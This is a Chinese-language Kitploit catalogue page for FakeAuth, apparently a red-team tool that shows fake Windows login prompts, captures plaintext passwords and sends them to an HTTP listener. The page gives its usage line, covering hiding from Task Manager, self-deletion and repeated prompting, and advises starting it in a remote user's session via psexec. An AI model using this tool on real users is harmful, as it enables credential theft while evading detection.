Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
FakeAuth — 创建伪造的身份验证提示,以捕获用户的明文密码。 | Kitploit
工具/GitHubGitHub/atn1ght/fakeauth
密码攻击钓鱼攻击社会工程学红队
GitHubatn1ght/fakeauth

FakeAuth

创建伪造的身份验证提示,以捕获用户的明文密码。

查看仓库
355年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

FakeAuth

FakeAuth 是一个通过弹出用户凭据提示框并使用 HTTP 协议进行数据外泄的工具。

灵感来源于以下项目

  1. hlldz's PICKL3 https://github.com/hlldz/pickl3

代码可能比较粗糙,还带着一些 bug ;)

安装

没有特殊要求

使用方法 v1.01

root@kitploit:~
Usage:   FakeAuth.exe <hide> <mode> <type> <count> <title> <message> <listener>
Example: FakeAuth.exe 1 1 1 10 window_title enter_creds 10.0.0.0:80\n
hide     (integer) -> Hide Process in Taskmgr by WinAPI-Hook (0,1 - requires FakeAuth.dll) 
mode     (integer) -> Self-Delete at process stop (0,1) - .dll only possible if taskmgr closed!
type     (integer) -> Prompt Style (1,2)
count    (long)    -> How many prompts after invalid Credentials (0,1,2,..,n 0=unlimited)
title    (string)  -> Prompt title (visible in type=1 only)
message  (string)  -> Window message
listener (string)  -> HTTP exfiltration listener (10.0.0.0:80), if not specified print stdout

最佳使用方式是在远程机器的用户会话中启动(使用 psexec 或其他辅助工具)。

联系方式

@atn1ght1 Twitter

下载工具